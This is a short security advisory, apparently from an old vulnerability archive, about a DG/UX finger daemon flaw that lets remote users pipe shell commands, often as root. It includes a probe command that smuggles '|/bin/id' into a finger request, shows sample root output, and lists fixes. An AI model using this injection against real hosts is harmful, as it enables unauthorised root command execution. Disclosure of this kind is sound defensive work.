Vulnerability

    in.fingerd

Affected

    DGUX

Description

    George Imburgia posted about another old bug that won't die.   The
    finger daemon  that ships  with dgux  will allow  a remote user to
    pipe commands, often with uid root or bin.

    To  check  for  this  vulnerability,  simply use the RFC compliant
    syntax;

        finger /W@host

    If it returns something like this, it may be vulnerable;

        Login name: /W                          In real life: ???

    To see the uid in.fingerd is running as, try this;

        finger "|/bin/id@host"

    Often, you will see something like this;

        uid=0(root) gid=0(root)

    or;

        uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

Solution

    1) disable fingerd,
    2) use  tcpwrappers,  and  have  a  wrapper program check for  the
       offending pipe and other shell specials,
    3) find  a third  party fingerd  that DOESN'T  have this wide open
       door to root.

    Apparently it's fixed in MU03.  DG/UX is officially up to 4.11MU04
    with 4.20 coming soon.